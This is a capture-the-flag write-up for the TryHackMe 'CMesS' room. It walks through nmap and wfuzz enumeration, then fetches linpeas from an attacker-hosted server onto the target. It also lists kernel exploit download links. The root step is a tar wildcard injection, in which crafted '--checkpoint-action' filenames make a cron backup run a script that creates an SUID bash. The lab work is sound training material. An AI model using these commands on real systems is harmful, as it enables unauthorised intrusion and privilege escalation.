TryHackMe - CMesS

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.125.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 12:09 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.20% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.26% done
Nmap scan report for cmess.thm (10.10.125.143)
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (92%), Linux 3.0 - 3.2 (92%), Linux 3.0 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1289.07 seconds

Port 80

With gobuster we found: /login and /admin
Let's look for subdomain wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://cmess.thm' -H "HOST: FUZZ.cmess.thm" --hw 290
We remove pages with 290 words because it is a not found response so not relevant for us even though the response code is 200. W find dev subdomain let's add it to /etc/hosts 10.10.125.143 dev.cmess.thm
We can try the CVE previously found with google
- => NOT WORKING
We stabilize our shell python3 -c 'import pty; pty.spawn("/bin/bash")'
Lets get a privesc enum script in our target. I am a fan of linpeas so I am gonna use it here.
- wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
- python3 -m http.server 80
- And from our target we type wget http://10.13.22.56/linpeas.sh (we need to be in the tmp folder to successfully write the file)
- We make it executable chmod +x linpeas.sh and we launch it ./linpeas.sh

Lateral movement

Interesting output from linpeas

List of cve we could try out

[+] [CVE-2017-16995] eBPF_verifier
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000112] NETIF_F_UFO
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
[+] [CVE-2016-8655] chocobo_root
[+] [CVE-2016-4557] double-fdput()
[+] [CVE-2021-3156] sudo Baron Samedit
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
[+] [CVE-2019-18634] sudo pwfeedback
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
[+] [CVE-2016-2384] usb-midi
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
[+] [CVE-2016-0728] keyring
      CVE-2016-8655
      CVE-2018-14665
      CVE-2017-16695

other interesting things to check

/etc/cron.d:
-rw-r--r--  1 root root  191 Feb  6  2020 popularity-contest
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -  
-rw------- 1 root root 317 Feb  6  2020 /etc/mysql/debian.cnf
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Feb  6  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
/usr/share/doc/openssh-client/examples/sshd_config 
/opt/.password.bak

The sudo version is not successful cause our version does not seem vulnerable.
We have another password
Let's now enumerate way to privesc from Andre's user

Privesc

Linepeas as Andre

This is doing a backup with a wildcard. We can try to abuse this.
Let's go to the backup folder
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh we create a malicious bash
touch /home/andre/backup/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit
Let's now try to launch our script /tmp/bash -p

PreviousTryHackMe - Blaster NextTryHackMe - ConvertMyVideo

Last updated 2 years ago